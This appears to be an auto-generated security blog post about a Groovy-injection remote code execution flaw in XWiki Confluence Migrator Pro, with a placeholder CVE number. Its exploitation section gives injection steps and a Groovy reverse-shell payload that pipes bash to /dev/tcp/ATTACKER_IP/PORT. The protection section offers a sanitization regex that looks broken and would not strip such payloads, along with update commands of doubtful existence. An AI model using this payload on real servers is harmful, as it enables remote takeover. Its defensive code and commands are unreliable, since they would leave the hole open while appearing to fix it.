XWiki Confluence Migrator Pro, Remote Code Execution, CVE-2025-XXXX (Critical)

Listen to this Post

How the CVE Works:

The vulnerability (CVE-2025-XXXX) in XWiki Confluence Migrator Pro (versions >= 1.0, < 1.2.0) allows unauthenticated remote code execution (RCE) due to unescaped translations in the Migration Page template. An attacker can exploit this by injecting malicious Groovy code into the `XWiki.TranslationDocumentClass` with `USER` scope. When a page is created using the vulnerable template, the injected code is executed on the server. For example, the payload `{{groovy}}println(“hello from groovy!”){{/groovy}}` will execute arbitrary Groovy code, leading to RCE. This vulnerability is critical as it allows attackers to gain full control of the server without requiring programming rights.

What Undercode Say:

Exploitation:

  1. Payload Injection: Inject Groovy code into the `XWiki.TranslationDocumentClass` with `USER` scope.

Example: `{{groovy}}println(“Exploit executed!”){{/groovy}}`

  1. Trigger Execution: Create a page using the Migration Page template to execute the payload.
  2. Reverse Shell: Use Groovy to spawn a reverse shell.

Example:

{{groovy}}
def p = "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'".execute()
p.waitFor()
{{/groovy}}

Protection:

1. Upgrade: Update to version 1.2.0 or later.

  1. Input Sanitization: Ensure all user inputs are sanitized and escaped.
  2. Access Control: Restrict access to the Migration Page template to trusted users only.

Commands:

1. Check Version:

xwiki-version-check --product confluence-migrator-pro

2. Patch Application:

xwiki-update --product confluence-migrator-pro --version 1.2.0

Code Snippets:

1. Sanitization Example:

String sanitizeInput(String input) {
return input.replaceAll("\{\{.?\}\}", "");
}
